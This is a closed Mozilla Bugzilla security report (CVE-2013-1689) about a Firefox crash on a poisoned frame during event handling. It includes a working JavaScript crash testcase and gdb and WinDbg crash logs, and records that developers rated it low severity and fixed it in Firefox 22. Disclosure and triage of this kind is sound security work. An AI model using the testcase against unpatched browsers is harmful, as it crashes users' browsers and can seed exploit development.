Closed Bug 817219 (CVE-2013-1689) Opened 12 years ago Closed 11 years ago

Crash @xul!nsDOMEvent::GetTargetFromFrame on poison value

Categories

(Core :: Layout, defect)

Product:
Core
Component:
Layout
Platform:
x86_64
Linux
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla22
Tracking Flags:
Tracking Status
firefox17 --- wontfix
firefox18 --- affected
firefox19 --- affected
firefox20 --- affected
firefox21 --- wontfix
firefox22 --- fixed
firefox-esr17 --- wontfix
b2g18 --- wontfix

People

(Reporter: nils, Assigned: MatsPalmgren_bugz)

References

Details

(4 keywords, Whiteboard: [fixed by bug 635852][adv-main22+])

Attachments

(2 files)

crash.html
117 bytes, text/plain
Details
crash.js (req'd by crash.html)
865 bytes, text/plain
Details
Attached file crash.html 
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20.0 Firefox/20.0
Build ID: 20121126030823

Steps to reproduce:

Description:
The attached testcase crashes the browser, which seems to be related to event handling with frames. Crashes on a poison value, which indicates a potentially exploitable behaviour.

Tested and Affected Versions:
Firefox 20.0a1 (trunk)
Firefox 17.0

Testcase:

crash.html:
<html>
<script src="crash.js"></script>
<script>
window.setTimeout("start();", 10);
</script>
<body>  
</body> 
</html>


crash.js:
function start() {
o3=document.createElement('input');
tmp = o3.ownerDocument.createElement('iframe');
document.body.appendChild(tmp);
o4=tmp.contentDocument;
cb_3=function() { var f = callback_3; callback_3 = null; return f(arguments); }
o3.addEventListener('change', cb_3, false);
o51=document.createElement('img');
o94=document.createElement('input');
o94.type='checkbox';
o3.appendChild(o94);
o192=document.createElement('input');
o192.type='button';
o94.appendChild(o192);
o263=document.createEvent('MouseEvents');
o263.initMouseEvent('click', true, true, window,0, 0, 0, 0, 0, false, false, false, false, 0, null);
o192.dispatchEvent(o263)
}
function callback_3() {
o192.addEventListener('DOMNodeRemoved', callback_21, true);
o51.appendChild(o192);
}
function callback_21() {
o4.documentElement.appendChild(o192);
location.reload();
}

When trying to include the Javascript code into the HTML it doesn't seem to be crashing on Windows. Both files are attached.

Crash log on Linux:
Program received signal SIGSEGV, Segmentation fault.
0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
(gdb) info reg
eax            0x0	0
ecx            0xffffff80	-128
edx            0xf35017ff	-212854785
ebx            0xf767adf8	-144200200
esp            0xfff7f150	0xfff7f150
ebp            0xfff7f168	0xfff7f168
esi            0xe17de3fc	-511843332
edi            0xe775be68	-411713944
eip            0xf68ba5a4	0xf68ba5a4 <nsWeakFrame::InitInternal(nsIFrame*)+52>
eflags         0x210282	[ SF IF RF ID ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99
(gdb) x/3i $eip
=> 0xf68ba5a4 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+52>:	mov    0x1c(%edx),%eax
   0xf68ba5a7 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+55>:	mov    (%eax),%edi
   0xf68ba5a9 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+57>:	mov    0xc(%edi),%eax
(gdb) bt 20
#0  0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so
#1  0xf6a07017 in nsEventStateManager::GetEventTarget() () from /home/fred/debugging/firefox/libxul.so
#2  0xf6a0d830 in nsDOMEvent::GetTargetFromFrame() () from /home/fred/debugging/firefox/libxul.so
#3  0xf6a0d8da in nsDOMEvent::InitPresContextData(nsPresContext*) () from /home/fred/debugging/firefox/libxul.so
#4  0xf6a1595c in nsDOMBeforeUnloadEvent::nsDOMBeforeUnloadEvent(nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#5  0xf6a159e2 in NS_NewDOMBeforeUnloadEvent(nsIDOMEvent**, nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so
#6  0xf69a1c5e in nsDocument::CreateEvent(nsAString_internal const&, nsIDOMEvent**) () from /home/fred/debugging/firefox/libxul.so
#7  0xf686f0b2 in nsDocumentViewer::PermitUnload(bool, bool*) () from /home/fred/debugging/firefox/libxul.so
#8  0xf6d337da in nsDocShell::InternalLoad(nsIURI*, nsIURI*, nsISupports*, unsigned int, unsigned short const*, char const*, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsIDocShell**, nsIRequest**) () from /home/fred/debugging/firefox/libxul.so
#9  0xf5f8377f in nsDocShell::LoadHistoryEntry(nsISHEntry*, unsigned int) () from /home/fred/debugging/firefox/libxul.so
#10 0xf6d27b2b in nsDocShell::Reload(unsigned int) () from /home/fred/debugging/firefox/libxul.so
#11 0xf5d90fea in nsLocation::Reload(bool) () from /home/fred/debugging/firefox/libxul.so
#12 0xf6eda590 in NS_InvokeByIndex_P () from /home/fred/debugging/firefox/libxul.so
#13 0xf6cecc6a in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) () from /home/fred/debugging/firefox/libxul.so
#14 0xf6cf37ac in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) () from /home/fred/debugging/firefox/libxul.so
#15 0xf709f156 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) () from /home/fred/debugging/firefox/libxul.so
#16 0xf709321a in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) () from /home/fred/debugging/firefox/libxul.so
#17 0xf7153545 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) () from /home/fred/debugging/firefox/libxul.so
#18 0xf7153649 in js::mjit::JaegerShot(JSContext*, bool) () from /home/fred/debugging/firefox/libxul.so
#19 0xf709ea30 in js::RunScript(JSContext*, JS::Handle<JSScript*>, js::StackFrame*) () from /home/fred/debugging/firefox/libxul.so


Crash log on Windows:
xul!nsDOMEvent::GetTargetFromFrame+0x137d3e
xul!nsDOMEvent::nsDOMEvent+0xbc
xul!NS_NewDOMBeforeUnloadEvent+0x1d
xul!nsEventDispatcher::CreateEvent+0x36f
xul!nsHTMLDocument::CreateEvent+0x38
xul!DocumentViewerImpl::PermitUnload+0xbb
xul!nsDocShell::InternalLoad+0x5f8
xul!nsDocShell::LoadHistoryEntry+0x256
xul!nsDocShell::Reload+0xd6
xul!nsLocation::Reload+0x39
xul!NS_InvokeByIndex_P+0x27
xul!XPCWrappedNative::CallMethod+0x319
xul!XPC_WN_CallMethod+0xaa
mozjs!js::InvokeKernel+0x59
mozjs!js::Interpret+0x6ce4
mozjs!js::RunScript+0x415
mozjs!js::InvokeKernel+0x250
mozjs!js::Invoke+0x128
mozjs!JS_CallFunctionValue+0x41
xul!nsXPCWrappedJSClass::CallMethod+0x488

xul!nsDOMEvent::GetTargetFromFrame+0x137d3e:
6ff5b80e 8b511c          mov     edx,dword ptr [ecx+1Ch] ds:002b:f0de801b=????????


reported by nils of vulndev ltd.
Component: DOM: Events → Layout
bp-391d1522-1a30-40b0-9435-e988b2121208

Confirming the crash on a poisoned frame. So far no one has found a bypass for the poisoning mitigation so exploitability seems unlikely.
Status: UNCONFIRMED → NEW
status-firefox17: --- → wontfix
status-firefox18: --- → affected
status-firefox19: --- → affected
status-firefox20: --- → affected
Ever confirmed: true
Keywords: crash, csec-dos, sec-low, testcase
The latest patch in bug 635852 fixes this.
Assignee: nobody → matspal
Depends on: 635852
Severity: normal → critical
Status: NEW → RESOLVED
Closed: 11 years ago
status-firefox21: --- → affected
Flags: in-testsuite?
Resolution: --- → FIXED
Whiteboard: [fixed by bug 635852]
Target Milestone: --- → mozilla22
Whiteboard: [fixed by bug 635852] → [fixed by bug 635852][adv-main22+]
Alias: CVE-2013-1689
https://hg.mozilla.org/integration/mozilla-inbound/rev/4af6737ce10b
Group: core-security
Flags: in-testsuite? → in-testsuite+
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: